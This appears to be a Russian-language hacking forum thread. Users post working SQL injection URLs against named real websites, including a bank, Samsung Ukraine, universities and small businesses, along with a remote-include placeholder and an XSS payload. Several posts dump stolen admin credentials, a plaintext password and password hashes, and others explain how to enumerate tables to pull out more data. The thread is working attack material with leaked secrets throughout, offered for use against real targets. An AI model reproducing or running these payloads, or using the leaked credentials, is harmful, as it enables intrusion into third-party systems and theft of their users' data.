SQL Инъекции

Code:

http://www.yuta.co.yu/en/yuta/member.asp?id=1+or+1=(SELECT+TOP+1+USERNAME+from+Admin)--

Code:

http://www.yuta.co.yu/en/yuta/member.asp?id=1+or+1=(SELECT+TOP+1+PASSWD+from+Admin)--

Данные админа:

Login: admin
Password: P@ssw0rd

Админка находится по адресу

Code:

http://www.yuta.co.yu/admin/

 

Четвертая версия не мешает провести ПХП иньекцию, так что пост надо в ПХП.

http://www.shidur.us/index.php?page=[шелл] - удаленные инклуд

 

Банк "Левобережный"

Давно мечтал похекать какой-нибудь банковский ресурс, но прав для чтения из users не хватает, не знаю что еще можно сделать
Версия 4.0.18

 

бригада строительная )))

Code:

http://brigada.uz/plugins/ansmt/ansmt_view.php?id=-44+union+select+1,2,3,4,5,6,concat_ws(0x3a,user_name,user_loginname,user_password,user_email),8,9,10,11,12,13,14+from+brigada_user

стоит двиг е107.

 

Урал Инфо Проект

Code:

http://www.uip.ru/index.php?id=-3'+UNION+SELECT+1,%3Cscript%3Ealert('H00k%20%E1%FB%EB%20%E7%E4%E5%F1%FC!')%3C/script%3E,3,4,5,6,7,8+FROM+news+--+

 

в антибояне проверял вроде нет

5.0.22:fortline@localhost:fortline

admin:Y2g3Yjhh

adm_music@localhost:4.0.27-log:music

 

Code:

http://rustelcard.ru/index.php?option=com_rwcards&task=listCards&category_id=-1'union%20select%201,2,03,4,concat(char(117,115,101,114,110,97,109,101,58),username,char(112,97,115,115,119,111,114,100,58),password),50,044,076,0678,07%20from%20jos_users/*

username:admin
password:06c09e25d642a677aa787b2cdee94350

 

Недвижимость

Code:

http://base.gwru.ru/in.php?id=-459+UNION+SELECT+1,2,3,password,email,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+FROM+users+--+

email:[email protected]
password:60bcdf9367b7aada606e446fecc1a47d
Также на сайте полно Xss

 

Либеральная партия Украины
http://www.lpu.org.ua/index.php?area=1+union+select+1,2,3,4,5,6/*
2Grey:
прошу прощенья но по поводу баяна не знал... и вообще каковы критерии для обощения данными аргументами... есть где-то ещё?..

 

4 мускул код: http://www.press.try.md/print.php?iddb=Polit&id=-87829+union+select+1,concat(version(),user(),database()),3,4,5,6,7,8/* чет не могу подобрать код: http://press.samsung.ua/news/card.php?id=-212+union+select+1,column_name,3+from+information_schema.columns/* если боян,то не бейте в репу,а лучше дайте ссылку на антибоян

 

Ты скажи: откуда в 4 мускуле бд information_schema

 

в каком 4? Я про самсунг сказал,а там 5 мускул

 

Admins

Visitor

Content

Medias

Есть ещё много

Code:

http://press.samsung.ua/news/card.php?id=-1+union+select+1111,role,concat(login,char(58),passw)+from+user+where+id=22+limit+0,1/*

меняй id и вытаскивай данные

Как посмотреть какие есть таблицы и поля:

Code:

http://press.samsung.ua/news/card.php?id=-1+union+select+1,concat(column_name,char(58),table_name),3+from+information_schema.columns+limit+349,1/*

меняй limit , он будет показывать какие поля есть в таблице (Поле:Таблица)

 

nero.com

http://www.nero.com/eng/showpress.php?id=-1+GROUP+BY+13/*

 

utsa.edu - PR=7

Code:

http://www.utsa.edu/today/archive/index.cfm?fuseaction=category&iStartRow=1&categoryid=@@version--
http://www.utsa.edu/today/archive/index.cfm?fuseaction=category&iStartRow=1&categoryid=(select%20system_user)
http://www.utsa.edu/today/archive/index.cfm?fuseaction=category&iStartRow=1&categoryid=(select%20db_name())

sju.edu - PR=7

Code:

http://www.sju.edu/hsb/campbell/research-guides/index-new2.php?subid=-1%20union%20select%201,2,3,4,5,6,7,8,version(),user(),11,12,13,database(),15,16,17/*

uprm.edu - PR=7

Code:

http://www.uprm.edu/library/cre/list_dbs.php?char=1'%20or%201=-1%20union%20select%201,aes_decrypt(aes_encrypt(concat(user(),0x3a,version(),0x3a,database()),0x71),0x71),3,4,5,6,7,8,9,10/*

 

PR8

http://www.aiim.org/standards.asp?id=1+or+1=@@version--

Таблицы:
'vwWebGroups'
vwWebArticleTypes
vwActivePages
vwWebOrderDetails
vwForums
'vwWebModules'
'vwPollResults'
'vwIndustryEventTypes'
'vwForumPosts'
'vwWebUserActivity'
'vwIndustryEvents'
'vwPollQuestions'
'vwWebUsers'
vwChapDisplay
vwWebEntityConfigs
vwWebApplications
vwCompanies
vwChapAllList
vwWebEntityMatchPolicyItems
'vwIndustryEventPollIds'
'vwWebArticles'
vwWebEntityMatchPolicies
vwMarkets
'vwWebProducts'
'vwAIIMChapters
и тд.

но при запросе,
http://www.aiim.org/standards.asp?id=1+or+1=(select+top+1+RequestDoc1+from+dbo.vwWebUsers)--

и при попытке использовать CMD выдается "The Querystring is invalid"

 

Code:

http://www.row-people.de/news/news.php?id=-1394+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,29+from+information_schema.tables/*

_4nob1oz - боян(

 

Давно не выкладывал

Code:

http://www.topguard.co.kr/noticeboard/notice_view.php?number=-8+union+select+1,2,3,4,5,6,7,concat_ws(0x3C62722F3E,USER(),DATABASE(),VERSION()),9,10,11,12,13,14,15,16,17/*

Старенькая БД

Code:

http://www.cleareyes.co.kr/itop20/gasa.php?number=-1+union+select+1,2,3,4,5,6,concat_ws(0x3C62722F3E,USER(),DATABASE(),VERSION()),8,9,10,11,12,13

 

Обновили антибоян, незабываем юзать.

http://filefront.jino-net.ru/sql.html

 

Code:

http://bystrzyca.pl/shows.php?nr=-9+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+limit+16,1/*

Code:

http://www.tigs-thaiwok.ch/ger.php?nr=-13+union+select+1,table_name,3,4,5,6,7,8,9+from+information_schema.tables+limit+16,1/*